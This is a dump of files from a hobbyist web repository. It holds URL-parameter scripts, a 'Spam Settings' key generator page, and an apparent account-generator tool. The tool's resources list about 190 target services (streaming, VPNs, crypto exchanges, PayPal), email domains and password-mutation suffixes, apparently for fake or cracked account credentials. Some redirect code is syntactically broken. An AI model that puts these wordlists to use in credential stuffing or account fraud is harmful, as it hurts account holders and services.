3 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/resc/urlread1.js: -------------------------------------------------------------------------------- 1 | function getAllUrlParams(url) { 2 | var queryString = url ? url.split('?')[1] : window.location.search.slice(1); 3 | var obj = {}; 4 | 5 | if (queryString) { 6 | queryString = queryString.split('#')[0]; 7 | var arr = queryString.split('&'); 8 | 9 | for (var i = 0; i < arr.length; i++) { 10 | var a = arr[i].split('='); 11 | var paramName = a[0]; 12 | var paramValue = typeof (a[1]) === 'undefined' ? true : a[1]; 13 | 14 | paramName = paramName.toLowerCase(); 15 | if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase(); 16 | 17 | if (paramName.match(/\[(\d+)?\]$/)) { 18 | var key = paramName.replace(/\[(\d+)?\]/, ''); 19 | if (!obj[key]) obj[key] = []; 20 | 21 | if (paramName.match(/\[\d+\]$/)) { 22 | var index = /\[(\d+)\]/.exec(paramName)[1]; 23 | obj[key][index] = paramValue; 24 | } else { 25 | obj[key].push(paramValue); 26 | } 27 | } else { 28 | if (!obj[paramName]) { 29 | obj[paramName] = paramValue; 30 | } else if (obj[paramName] && typeof obj[paramName] === 'string'){ 31 | obj[paramName] = [obj[paramName]]; 32 | obj[paramName].push(paramValue); 33 | } else { 34 | obj[paramName].push(paramValue); 35 | } 36 | } 37 | } 38 | } 39 | 40 | return obj; 41 | } 42 | var origin = window.location.href 43 | let origal = location.origin; 44 | let redr = getAllUrlParams(origin).togo 45 | if (redr == 'tos') { 46 | window.location.replace(origal+'/html/ToS'); 47 | } else if (redr == 'github' || 'main') { 48 | window.location.replace('https://github.com/Altify-Developing/Altify-Developing-Main'); 49 | } else if (redr == 'oldproxy' || 'oldgen') { 50 | window.location.replace(origal+"/html/NEW_TOOLS/ProxyGen"); 51 | } else (redr == 'tools') { 52 | window.location.replace(origal+'/html/toolstodownload'); 53 | } 54 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/resc/urlread2.js: -------------------------------------------------------------------------------- 1 | function getAllUrlParams(url) { 2 | var queryString = url ? url.split('?')[1] : window.location.search.slice(1); 3 | var obj = {}; 4 | 5 | if (queryString) { 6 | queryString = queryString.split('#')[0]; 7 | var arr = queryString.split('&'); 8 | 9 | for (var i = 0; i < arr.length; i++) { 10 | var a = arr[i].split('='); 11 | var paramName = a[0]; 12 | var paramValue = typeof (a[1]) === 'undefined' ? true : a[1]; 13 | 14 | paramName = paramName.toLowerCase(); 15 | if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase(); 16 | 17 | if (paramName.match(/\[(\d+)?\]$/)) { 18 | var key = paramName.replace(/\[(\d+)?\]/, ''); 19 | if (!obj[key]) obj[key] = []; 20 | 21 | if (paramName.match(/\[\d+\]$/)) { 22 | var index = /\[(\d+)\]/.exec(paramName)[1]; 23 | obj[key][index] = paramValue; 24 | } else { 25 | obj[key].push(paramValue); 26 | } 27 | } else { 28 | if (!obj[paramName]) { 29 | obj[paramName] = paramValue; 30 | } else if (obj[paramName] && typeof obj[paramName] === 'string'){ 31 | obj[paramName] = [obj[paramName]]; 32 | obj[paramName].push(paramValue); 33 | } else { 34 | obj[paramName].push(paramValue); 35 | } 36 | } 37 | } 38 | } 39 | 40 | return obj; 41 | } 42 | var origin = window.location.href 43 | let origal = location.origin; 44 | let refer = getAllUrlParams(origin).ref 45 | if (refer == 'indeed') { 46 | document.getElementById("refsrc").innerHTML = 'Referred by: '+refer; 47 | } else if (refer == 'github') { 48 | document.getElementById("refsrc").innerHTML = 'Referred by: '+refer; 49 | } 50 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/resc/urlread3.js: -------------------------------------------------------------------------------- 1 | function getAllUrlParams(url) { 2 | var queryString = url ? url.split('?')[1] : window.location.search.slice(1); 3 | var obj = {}; 4 | 5 | if (queryString) { 6 | queryString = queryString.split('#')[0]; 7 | var arr = queryString.split('&'); 8 | 9 | for (var i = 0; i < arr.length; i++) { 10 | var a = arr[i].split('='); 11 | var paramName = a[0]; 12 | var paramValue = typeof (a[1]) === 'undefined' ? true : a[1]; 13 | 14 | paramName = paramName.toLowerCase(); 15 | if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase(); 16 | 17 | if (paramName.match(/\[(\d+)?\]$/)) { 18 | var key = paramName.replace(/\[(\d+)?\]/, ''); 19 | if (!obj[key]) obj[key] = []; 20 | 21 | if (paramName.match(/\[\d+\]$/)) { 22 | var index = /\[(\d+)\]/.exec(paramName)[1]; 23 | obj[key][index] = paramValue; 24 | } else { 25 | obj[key].push(paramValue); 26 | } 27 | } else { 28 | if (!obj[paramName]) { 29 | obj[paramName] = paramValue; 30 | } else if (obj[paramName] && typeof obj[paramName] === 'string'){ 31 | obj[paramName] = [obj[paramName]]; 32 | obj[paramName].push(paramValue); 33 | } else { 34 | obj[paramName].push(paramValue); 35 | } 36 | } 37 | } 38 | } 39 | 40 | return obj; 41 | } 42 | var origin = window.location.href 43 | let origal = location.origin; 44 | let refer = getAllUrlParams(origin).ref 45 | if (refer == 'indeed') { 46 | document.getElementById("refsrc").innerHTML = 'Referred by: '+refer; 47 | } else if (refer == 'github') { 48 | document.getElementById("refsrc").innerHTML = 'Referred by: '+refer; 49 | } 50 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/resc/urlread4.js: -------------------------------------------------------------------------------- 1 | function getAllUrlParams(url) { 2 | var queryString = url ? url.split('?')[1] : window.location.search.slice(1); 3 | var obj = {}; 4 | 5 | if (queryString) { 6 | queryString = queryString.split('#')[0]; 7 | var arr = queryString.split('&'); 8 | 9 | for (var i = 0; i < arr.length; i++) { 10 | var a = arr[i].split('='); 11 | var paramName = a[0]; 12 | var paramValue = typeof (a[1]) === 'undefined' ? true : a[1]; 13 | 14 | paramName = paramName.toLowerCase(); 15 | if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase(); 16 | 17 | if (paramName.match(/\[(\d+)?\]$/)) { 18 | var key = paramName.replace(/\[(\d+)?\]/, ''); 19 | if (!obj[key]) obj[key] = []; 20 | 21 | if (paramName.match(/\[\d+\]$/)) { 22 | var index = /\[(\d+)\]/.exec(paramName)[1]; 23 | obj[key][index] = paramValue; 24 | } else { 25 | obj[key].push(paramValue); 26 | } 27 | } else { 28 | if (!obj[paramName]) { 29 | obj[paramName] = paramValue; 30 | } else if (obj[paramName] && typeof obj[paramName] === 'string'){ 31 | obj[paramName] = [obj[paramName]]; 32 | obj[paramName].push(paramValue); 33 | } else { 34 | obj[paramName].push(paramValue); 35 | } 36 | } 37 | } 38 | } 39 | 40 | return obj; 41 | } 42 | var origin = window.location.href 43 | let origal = location.origin; 44 | let mail1 = getAllUrlParams(origin).mo 45 | let mail2 = getAllUrlParams(origin).mt 46 | let x32 = getAllUrlParams(origin).cor 47 | let x64 = getAllUrlParams(origin).lec 48 | if (mail1 == '1' && mail2 == 'ps') { 49 | document.getElementById("mailing").innerHTML = "email"; 50 | } 51 | if ((x32 == 'ON2GCY3LN53GK4TGNRXXOLLYGMZC2ZLOMNXWIZLE' && x64 == 'U3RhY2tPdmVyZmxvdw0KQWx0aWZ5IERldmVsb3BpbmcgTExD') || (refer == 'stackoverflow')) { 52 | document.write("

Redirecting

"); 53 | setTimeout(redrct, 2000) 54 | function redrct() { 55 | window.location.replace('mailto:stackoverflow-application-inbox@psnator.com?subject=GitHub%20Organization%20%5B%20APPLICATION%20%5D&body=%2F%2F%20Do%20not%20remove%20this%20text%0D%0A%2F%2F%20enter%20text%20in%20%7Binput%7D%20sections%20%26%20summarize%20your%20answers%0D%0A%2F%2F%20You%20will%20not%20receive%20an%20email%20from%20this%20inbox%2C%20it%20is%20set%20to%20receiving%20only%2C%20you%20will%20be%20contacted%20by%20another%20email%20with%20the%20following%20%40psnator.com%0D%0A%0D%0ADear%20Altify%2C%0D%0A%0D%0AI%20am%20contacting%20you%20to%20apply%20for%20your%20GitHub%20organization%2C%20I%20specialize%20in%20%7Bskill%7D%2C%20and%20my%20secondary%20skill%20is%20%7Bsecondary%20skill%7D.%20I%20think%20that%20I%20am%20a%20good%20fit%20for%20your%20organization%20because%20%7Breason%7D.%0D%0A%0D%0AFrom%2C%0D%0A%7Bname%7D%0D%0A%0D%0A%7Bcontact%20information%7D%0D%0A%0D%0A%2F%2F%20example%40email.com%20-%20Required%0D%0A%2F%2F%0D%0A%2F%2F%20business%20title%20-%20Optional%0D%0A%2F%2F%0D%0A%2F%2F%20%40githubusername999%20-%20Required%0D%0A%2F%2F%0D%0A%2F%2F%20%2B0%20(123)-456-7890%20-%20Optional%0D%0A%2F%2F%0D%0A%2F%2F%20%5E%5E%20Contact%20info%20example%20%5E%5E%0D%0A%2F%2F%0D%0A%2F%2F%20Delete%20this%20example%0D%0A%0D%0A%0D%0AP.S.%0D%0A%7Boptional%20section%7D%0D%0A%0D%0A%2F%2F%20%5E%5E%20OPTIONAL%20%5E%5E%0D%0A%2F%2F%20If%20you%20do%20not%20want%20to%20add%20a%20postscript%20message%2C%20then%20leave%20that%20part%20blank.%0D%0A%0D%0A%0D%0A'); 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/resc/urlread5.js: -------------------------------------------------------------------------------- 1 | function getAllUrlParams(url) { 2 | var queryString = url ? url.split('?')[1] : window.location.search.slice(1); 3 | var obj = {}; 4 | 5 | if (queryString) { 6 | queryString = queryString.split('#')[0]; 7 | var arr = queryString.split('&'); 8 | 9 | for (var i = 0; i < arr.length; i++) { 10 | var a = arr[i].split('='); 11 | var paramName = a[0]; 12 | var paramValue = typeof (a[1]) === 'undefined' ? true : a[1]; 13 | 14 | paramName = paramName.toLowerCase(); 15 | if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase(); 16 | 17 | if (paramName.match(/\[(\d+)?\]$/)) { 18 | var key = paramName.replace(/\[(\d+)?\]/, ''); 19 | if (!obj[key]) obj[key] = []; 20 | 21 | if (paramName.match(/\[\d+\]$/)) { 22 | var index = /\[(\d+)\]/.exec(paramName)[1]; 23 | obj[key][index] = paramValue; 24 | } else { 25 | obj[key].push(paramValue); 26 | } 27 | } else { 28 | if (!obj[paramName]) { 29 | obj[paramName] = paramValue; 30 | } else if (obj[paramName] && typeof obj[paramName] === 'string'){ 31 | obj[paramName] = [obj[paramName]]; 32 | obj[paramName].push(paramValue); 33 | } else { 34 | obj[paramName].push(paramValue); 35 | } 36 | } 37 | } 38 | } 39 | 40 | return obj; 41 | } 42 | var origin = window.location.href 43 | let origal = location.origin; 44 | let mail1 = getAllUrlParams(origin).mo 45 | let mail2 = getAllUrlParams(origin).mt 46 | if (mail1 == '1' && mail2 == 'ps') { 47 | document.getElementById("mailing").innerHTML = "email"; 48 | } 49 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/resc/urlread6.js: -------------------------------------------------------------------------------- 1 | function getAllUrlParams(url) { 2 | var queryString = url ? url.split('?')[1] : window.location.search.slice(1); 3 | var obj = {}; 4 | 5 | if (queryString) { 6 | queryString = queryString.split('#')[0]; 7 | var arr = queryString.split('&'); 8 | 9 | for (var i = 0; i < arr.length; i++) { 10 | var a = arr[i].split('='); 11 | var paramName = a[0]; 12 | var paramValue = typeof (a[1]) === 'undefined' ? true : a[1]; 13 | 14 | paramName = paramName.toLowerCase(); 15 | if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase(); 16 | 17 | if (paramName.match(/\[(\d+)?\]$/)) { 18 | var key = paramName.replace(/\[(\d+)?\]/, ''); 19 | if (!obj[key]) obj[key] = []; 20 | 21 | if (paramName.match(/\[\d+\]$/)) { 22 | var index = /\[(\d+)\]/.exec(paramName)[1]; 23 | obj[key][index] = paramValue; 24 | } else { 25 | obj[key].push(paramValue); 26 | } 27 | } else { 28 | if (!obj[paramName]) { 29 | obj[paramName] = paramValue; 30 | } else if (obj[paramName] && typeof obj[paramName] === 'string'){ 31 | obj[paramName] = [obj[paramName]]; 32 | obj[paramName].push(paramValue); 33 | } else { 34 | obj[paramName].push(paramValue); 35 | } 36 | } 37 | } 38 | } 39 | 40 | return obj; 41 | } 42 | var origin = window.location.href 43 | let origal = location.origin; 44 | let x32 = getAllUrlParams(origin).cor 45 | let x64 = getAllUrlParams(origin).lec 46 | if ((x32 == 'ON2GCY3LN53GK4TGNRXXOLLYGMZC2ZLOMNXWIZLE' && x64 == 'U3RhY2tPdmVyZmxvdw0KQWx0aWZ5IERldmVsb3BpbmcgTExD') || (refer == 'stackoverflow')) { 47 | document.write("

Redirecting

"); 48 | setTimeout(redrct, 2000) 49 | function redrct() { 50 | window.location.replace('mailto:stackoverflow-application-inbox@psnator.com?subject=GitHub%20Organization%20%5B%20APPLICATION%20%5D&body=%2F%2F%20Do%20not%20remove%20this%20text%0D%0A%2F%2F%20enter%20text%20in%20%7Binput%7D%20sections%20%26%20summarize%20your%20answers%0D%0A%2F%2F%20You%20will%20not%20receive%20an%20email%20from%20this%20inbox%2C%20it%20is%20set%20to%20receiving%20only%2C%20you%20will%20be%20contacted%20by%20another%20email%20with%20the%20following%20%40psnator.com%0D%0A%0D%0ADear%20Altify%2C%0D%0A%0D%0AI%20am%20contacting%20you%20to%20apply%20for%20your%20GitHub%20organization%2C%20I%20specialize%20in%20%7Bskill%7D%2C%20and%20my%20secondary%20skill%20is%20%7Bsecondary%20skill%7D.%20I%20think%20that%20I%20am%20a%20good%20fit%20for%20your%20organization%20because%20%7Breason%7D.%0D%0A%0D%0AFrom%2C%0D%0A%7Bname%7D%0D%0A%0D%0A%7Bcontact%20information%7D%0D%0A%0D%0A%2F%2F%20example%40email.com%20-%20Required%0D%0A%2F%2F%0D%0A%2F%2F%20business%20title%20-%20Optional%0D%0A%2F%2F%0D%0A%2F%2F%20%40githubusername999%20-%20Required%0D%0A%2F%2F%0D%0A%2F%2F%20%2B0%20(123)-456-7890%20-%20Optional%0D%0A%2F%2F%0D%0A%2F%2F%20%5E%5E%20Contact%20info%20example%20%5E%5E%0D%0A%2F%2F%0D%0A%2F%2F%20Delete%20this%20example%0D%0A%0D%0A%0D%0AP.S.%0D%0A%7Boptional%20section%7D%0D%0A%0D%0A%2F%2F%20%5E%5E%20OPTIONAL%20%5E%5E%0D%0A%2F%2F%20If%20you%20do%20not%20want%20to%20add%20a%20postscript%20message%2C%20then%20leave%20that%20part%20blank.%0D%0A%0D%0A%0D%0A'); 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/tempmailcomposer/test.html: -------------------------------------------------------------------------------- 1 |
2 | 3 |
4 | 5 | 6 |
7 |
8 | 9 | 10 |
11 |
12 | 13 | 14 |
15 |
16 | 17 | 18 |
19 |
20 | 21 | 22 |
23 |
24 |
25 |
26 | 27 |
28 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/w10/generator.html: -------------------------------------------------------------------------------- 1 | 2 | 13 | 14 | 15 | 16 | 17 | 18 |
19 |

Spam Settings 20 | 21 | 22 | 23 | 24 |

Click the keys to copy them

25 |

26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /html/NEW_TOOLS/w10/w10.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/NEW_TOOLS/w10/w10.gif -------------------------------------------------------------------------------- /html/NewTab409.html: -------------------------------------------------------------------------------- 1 | 73 | -------------------------------------------------------------------------------- /html/OAG/Resources/States/Mexico.txt: -------------------------------------------------------------------------------- 1 | Aguascalientes 2 | Baja California 3 | Baja California Sur 4 | Campeche 5 | Chiapas 6 | Chihuahua 7 | Coahuila 8 | Colima 9 | Cuidad de Mexico 10 | Durango 11 | Guanajuato 12 | Guerrero 13 | Hidalgo 14 | Jalisco 15 | Mexico 16 | Michoacan 17 | Morelos 18 | Nayarit 19 | Nuevo Leon 20 | Oaxaca 21 | Puebla 22 | Queretaro 23 | Quintana Roo 24 | San Luis Potosi 25 | Sinaloa 26 | Sonora 27 | Tabasco 28 | Tamaulipas 29 | Tlaxcala 30 | Veracruz 31 | Yucatan 32 | Zacatecas 33 | -------------------------------------------------------------------------------- /html/OAG/Resources/States/USA.txt: -------------------------------------------------------------------------------- 1 | Alabama 2 | Alaska 3 | Arizona 4 | Arkansas 5 | California 6 | Colorado 7 | Connecticut 8 | Delaware 9 | Florida 10 | Georgia 11 | Hawaii 12 | Idaho 13 | Illinois 14 | Indiana 15 | Iowa 16 | Kansas 17 | Kentucky 18 | Louisiana 19 | Maine 20 | Maryland 21 | Massachusetts 22 | Michigan 23 | Minnesota 24 | Mississippi 25 | Missouri 26 | Montana 27 | Nebraska 28 | Nevada 29 | New Hampshire 30 | New Jersey 31 | New Mexico 32 | New York 33 | North Carolina 34 | North Dakota 35 | Ohio 36 | Oklahoma 37 | Oregon 38 | Pennsylvania 39 | Rhode Island 40 | South Carolina 41 | South Dakota 42 | Tennessee 43 | Texas 44 | Utah 45 | Vermont 46 | Virginia 47 | Washington 48 | West Virginia 49 | Wisconsin 50 | Wyoming 51 | -------------------------------------------------------------------------------- /html/OAG/Resources/Types/ACCS.txt: -------------------------------------------------------------------------------- 1 | animelab 2 | apeaksoft 3 | apple-tv+ 4 | at&t-tv 5 | aternos 6 | aviraphantomvpn 7 | azure 8 | bang.com 9 | binance 10 | bitbuy 11 | bitcoin 12 | bitdefender 13 | bitfinex 14 | bitsquare 15 | bitstamp 16 | bittrex 17 | blockchain 18 | brazzers 19 | buffalo 20 | bww 21 | calm 22 | cbs 23 | cex.io 24 | changelly 25 | changenow 26 | chaterbate 27 | chaturbate 28 | chess.com 29 | cod 30 | coinbase 31 | coinmama 32 | coolmuster 33 | crunchyroll 34 | curiositystream 35 | cyberghostvpn 36 | dazn 37 | deezer 38 | direct-tv 39 | disney+ 40 | dofus 41 | dominos 42 | doordash 43 | duolingo 44 | edu 45 | epicgames 46 | etoro 47 | expressvpn‎ 48 | fakku.net 49 | firehouse 50 | fitbit 51 | fortnite 52 | fox 53 | free.fr 54 | fubotv 55 | funimation 56 | gemini 57 | gfuel 58 | globoplay 59 | glovo 60 | gmc 61 | gmx 62 | golfnow 63 | google 64 | gucci 65 | hallmark 66 | hbo 67 | hbo-max 68 | hide.mevpn 69 | hidemyassvpn 70 | hmavpn 71 | hotspotshieldvpn 72 | hulu 73 | huobi 74 | imvu 75 | ippies.nl 76 | ipvanish 77 | ivacyvpn 78 | japancrate 79 | kanopy 80 | kapersky 81 | kaspersky 82 | keepsolidvpn 83 | kinky.nl 84 | kraken 85 | kwelitv 86 | lifeselector 87 | linkcoin 88 | livestream.com 89 | localbitcoins 90 | lol 91 | luno 92 | mail-access 93 | malwarebytes 94 | mcafee 95 | medal.tv 96 | mediafire 97 | mega.nz 98 | microsoft 99 | minecraft 100 | mlb 101 | mlb.tv 102 | mullvadvpn 103 | mycanal‎ 104 | namecheapvpn 105 | napstar 106 | nba 107 | netflix 108 | nintendo 109 | nordvpn 110 | norton 111 | nutako 112 | nutaku 113 | onlyfans 114 | openvpn 115 | orange-tv 116 | orange.fr 117 | origin 118 | pandora 119 | paramount 120 | patreon 121 | paypal 122 | pbs-documentaries 123 | peacock 124 | pebblehost 125 | picsart 126 | piscart 127 | plex 128 | plextv 129 | ploudos 130 | pokemon-go 131 | poloniex 132 | pornhub 133 | pornhub.com 134 | privateinternetaccess 135 | privatevpn 136 | protonvpn 137 | psn 138 | pub-g 139 | pub-g.lite 140 | pubg 141 | pubg.lite 142 | purevpn 143 | rakuten 144 | rapidgator 145 | razer 146 | restaurant.com 147 | resturant.com 148 | roblox 149 | rockradio 150 | rockstar 151 | runescape 152 | sahidvpn 153 | scribd 154 | sfrtv 155 | shadow 156 | shadow.tech 157 | shapeshift‎ 158 | showtime 159 | shudder 160 | slingtv 161 | snapchat 162 | sonyvegas 163 | spotify 164 | steam 165 | surfeasy 166 | surfshark 167 | tidal 168 | tiktok 169 | tnaflix 170 | tunnelbearvpn 171 | twitch.tv 172 | twitter 173 | ufc 174 | ultimateguitar 175 | uplay 176 | valorant 177 | venmo 178 | viaplay 179 | vrv 180 | vyprvpn 181 | wendys 182 | windscribe 183 | wish 184 | wondersharefilmora 185 | xboxgamepass 186 | xfinity 187 | xnnx.com 188 | yahoo 189 | zee5 190 | zenmatevpn 191 | zoosk 192 | -------------------------------------------------------------------------------- /html/OAG/Resources/email_endings.txt: -------------------------------------------------------------------------------- 1 | @gmail.com 2 | @mdusd.net 3 | @edu.com 4 | @gmail.to.de 5 | @gmx.com 6 | @starbucks.com 7 | @coffee.com 8 | @fetchrewards.com 9 | @rufskin.com 10 | @symbolab.com 11 | @greyhound.com 12 | @hotstar.com 13 | @khanacademy.com 14 | @iqoptions.com 15 | @wwe.com 16 | @adobe.com 17 | @genshinimpact.com 18 | @boostjuice.com 19 | @voot.com 20 | @paysafecard.com 21 | @lynda.com 22 | @myfitnesspal.com 23 | @sam's-club.com 24 | @pizzahutusa.com 25 | @pizzahutuk.com 26 | @factorio.com 27 | @stockx.com 28 | @zlibrary.com 29 | @adsfly.com 30 | @mrskins.com 31 | @getnaughty.com 32 | @nfl.com 33 | @jetbrains.com 34 | @prezi.com 35 | @codeacademy.com 36 | @virtualdj.com 37 | @bluehost.com 38 | @wix.com 39 | @wordpress.com 40 | @weebly.com 41 | @ghost.org 42 | @blogger.com 43 | @joomla.com 44 | @jimdo.com 45 | @godaddy.com 46 | @gmailnator.com 47 | @psnator.com 48 | @hotmail.com 49 | @outlook.com 50 | @aol.com 51 | -------------------------------------------------------------------------------- /html/OAG/Resources/special_character.txt: -------------------------------------------------------------------------------- 1 | ! 2 | $ 3 | & 4 | * 5 | + 6 | - 7 | _ 8 | . 9 | ?! 10 | $ 11 | & 12 | * 13 | + 14 | - 15 | _ 16 | .! 17 | $! 18 | $ 19 | &! 20 | $ 21 | & 22 | *! 23 | $ 24 | & 25 | * 26 | +! 27 | $ 28 | & 29 | * 30 | + 31 | -! 32 | $ 33 | & 34 | * 35 | + 36 | - 37 | _! 38 | $ 39 | & 40 | * 41 | + 42 | - 43 | _ 44 | .! 45 | $ 46 | & 47 | * 48 | + 49 | - 50 | _ 51 | . 52 | ? 53 | ? 54 | . 55 | ? 56 | _ 57 | . 58 | ? 59 | - 60 | _ 61 | . 62 | ? 63 | + 64 | - 65 | _ 66 | . 67 | ? 68 | * 69 | + 70 | - 71 | _ 72 | . 73 | ? 74 | & 75 | * 76 | + 77 | - 78 | _ 79 | . 80 | ? 81 | ? 82 | 123 83 | 321 84 | 999 85 | ! 86 | $ 87 | & 88 | * 89 | + 90 | - 91 | _ 92 | . 93 | ?! 94 | $ 95 | & 96 | * 97 | + 98 | - 99 | _ 100 | .! 101 | $! 102 | $ 103 | &! 104 | $ 105 | & 106 | *! 107 | $ 108 | & 109 | * 110 | +! 111 | $ 112 | & 113 | * 114 | + 115 | -! 116 | $ 117 | & 118 | * 119 | + 120 | - 121 | _! 122 | $ 123 | & 124 | * 125 | + 126 | - 127 | _ 128 | .! 129 | $ 130 | & 131 | * 132 | + 133 | - 134 | _ 135 | . 136 | ? 137 | ? 138 | . 139 | ? 140 | _ 141 | . 142 | ? 143 | - 144 | _ 145 | . 146 | ? 147 | + 148 | - 149 | _ 150 | . 151 | ? 152 | * 153 | + 154 | - 155 | _ 156 | . 157 | ? 158 | & 159 | * 160 | + 161 | - 162 | _ 163 | . 164 | ? 165 | ? 166 | 123 167 | 321 168 | 999 169 | ! 170 | $ 171 | & 172 | * 173 | + 174 | - 175 | _ 176 | . 177 | ?! 178 | $ 179 | & 180 | * 181 | + 182 | - 183 | _ 184 | .! 185 | $! 186 | $ 187 | &! 188 | $ 189 | & 190 | *! 191 | $ 192 | & 193 | * 194 | +! 195 | $ 196 | & 197 | * 198 | + 199 | -! 200 | $ 201 | & 202 | * 203 | + 204 | - 205 | _! 206 | $ 207 | & 208 | * 209 | + 210 | - 211 | _ 212 | .! 213 | $ 214 | & 215 | * 216 | + 217 | - 218 | _ 219 | . 220 | ? 221 | ? 222 | . 223 | ? 224 | _ 225 | . 226 | ? 227 | - 228 | _ 229 | . 230 | ? 231 | + 232 | - 233 | _ 234 | . 235 | ? 236 | * 237 | + 238 | - 239 | _ 240 | . 241 | ? 242 | & 243 | * 244 | + 245 | - 246 | _ 247 | . 248 | ? 249 | ? 250 | 123 251 | 321 252 | 999 253 | 420 254 | 69 255 | 6969 256 | 9000 257 | 8000 258 | 7000 259 | 6000 260 | 5000 261 | 4000 262 | 3000 263 | 2000 264 | 1000 265 | 69420 266 | 123! 267 | 321! 268 | 999! 269 | 420! 270 | 69! 271 | 6969! 272 | 9000! 273 | 8000! 274 | 7000! 275 | 6000! 276 | 5000! 277 | 4000! 278 | 3000! 279 | 2000! 280 | 1000! 281 | 69420! 282 | 123?$ 283 | 321?$ 284 | 999?$ 285 | 420?$ 286 | 69?$ 287 | 6969?$ 288 | 9000?$ 289 | 8000?$ 290 | 7000?$ 291 | 6000?$ 292 | 5000?$ 293 | 4000?$ 294 | 3000?$ 295 | 2000?$ 296 | 1000?$ 297 | 69420?$ 298 | 123& 299 | 321& 300 | 999& 301 | 420& 302 | 69& 303 | 6969& 304 | 9000& 305 | 8000& 306 | 7000& 307 | 6000& 308 | 5000& 309 | 4000& 310 | 3000& 311 | 2000& 312 | 1000& 313 | 69420& 314 | 123* 315 | 321* 316 | 999* 317 | 420* 318 | 69* 319 | 6969* 320 | 9000* 321 | 8000* 322 | 7000* 323 | 6000* 324 | 5000* 325 | 4000* 326 | 3000* 327 | 2000* 328 | 1000* 329 | 69420* 330 | 123+ 331 | 321+ 332 | 999+ 333 | 420+ 334 | 69+ 335 | 6969+ 336 | 9000+ 337 | 8000+ 338 | 7000+ 339 | 6000+ 340 | 5000+ 341 | 4000+ 342 | 3000+ 343 | 2000+ 344 | 1000+ 345 | 69420+ 346 | 123- 347 | 321- 348 | 999- 349 | 420- 350 | 69- 351 | 6969- 352 | 9000- 353 | 8000- 354 | 7000- 355 | 6000- 356 | 5000- 357 | 4000- 358 | 3000- 359 | 2000- 360 | 1000- 361 | 69420- 362 | 123_ 363 | 321_ 364 | 999_ 365 | 420_ 366 | 69_ 367 | 6969_ 368 | 9000_ 369 | 8000_ 370 | 7000_ 371 | 6000_ 372 | 5000_ 373 | 4000_ 374 | 3000_ 375 | 2000_ 376 | 1000_ 377 | 69420_ 378 | 123. 379 | 321. 380 | 999. 381 | 420. 382 | 69. 383 | 6969. 384 | 9000. 385 | 8000. 386 | 7000. 387 | 6000. 388 | 5000. 389 | 4000. 390 | 3000. 391 | 2000. 392 | 1000. 393 | 69420. 394 | 123!! 395 | 321!! 396 | 999!! 397 | 420!! 398 | 69!! 399 | 6969!! 400 | 9000!! 401 | 8000!! 402 | 7000!! 403 | 6000!! 404 | 5000!! 405 | 4000!! 406 | 3000!! 407 | 2000!! 408 | 1000!! 409 | 69420!! 410 | 123! 411 | 123$ 412 | 123& 413 | 123* 414 | 123+ 415 | 123- 416 | 123_ 417 | 123. 418 | 123? 419 | 321! 420 | 321$ 421 | 321& 422 | 321* 423 | 321+ 424 | 321- 425 | 321_ 426 | 321. 427 | 321? 428 | 999! 429 | 999$ 430 | 999& 431 | 999* 432 | 999+ 433 | 999- 434 | 999_ 435 | 999. 436 | 999? 437 | PASSWORD! 438 | PASSWORD$ 439 | PASSWORD& 440 | PASSWORD* 441 | PASSWORD+ 442 | PASSWORD- 443 | PASSWORD_ 444 | PASSWORD. 445 | PASSWORD? 446 | -------------------------------------------------------------------------------- /html/OAG/autocirculation.js: -------------------------------------------------------------------------------- 1 | $(document).ready(function() { 2 | if (window.location.href.indexOf("circulation=true") > -1) { 3 | setInterval(randomString, 1000); 4 | setInterval(refrsh, 1000); 5 | function refrsh() { 6 | window.location.replace("https://altify-developing-001.netlify.app/html/oag/aio_plain.src.html/?circulation=true&ref%20count="+refcount); 7 | } 8 | } 9 | }); 10 | -------------------------------------------------------------------------------- /html/OAG/csrf.js: -------------------------------------------------------------------------------- 1 | setTimeout(randomString, 200); 2 | function randomString(length, chars) { 3 | refcount = Math.floor(Math.random() * 100000) + 1; 4 | var result = ''; 5 | for (var i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)]; 6 | return result; 7 | } 8 | csrf = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); 9 | document.getElementById("csrfid").innerHTML = (csrf); 10 | -------------------------------------------------------------------------------- /html/OAG/img/AltifyOAG.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/OAG/img/AltifyOAG.gif -------------------------------------------------------------------------------- /html/OAG/img/refresh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/html/OAG/img/refresh.png -------------------------------------------------------------------------------- /html/OAG/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: black; 3 | } 4 | 5 | h3 { 6 | color: darkgreen; 7 | } 8 | 9 | h3.right { 10 | display: block; 11 | margin-left: 1100; 12 | margin-right: 100; 13 | width: 50%; 14 | } 15 | 16 | .center { 17 | display: block; 18 | margin-left: auto; 19 | margin-right: auto; 20 | width: 50%; 21 | } 22 | 23 | p30 { 24 | color: darkgreen; 25 | text-align: center; 26 | } 27 | 28 | p20 { 29 | color: darkgreen; 30 | text-align: left; 31 | } 32 | 33 | p10 { 34 | color: darkgreen; 35 | text-align: right; 36 | } 37 | 38 | p { 39 | color: green; 40 | font-family: verdana; 41 | font-size: 10px; 42 | } 43 | 44 | p.small { 45 | line-height: 0.35; 46 | } 47 | 48 | p.center { 49 | display: block; 50 | margin-left: 600px; 51 | margin-right: 100px; 52 | width: 50%; 53 | } 54 | 55 | box { 56 | font-size: 18px; 57 | 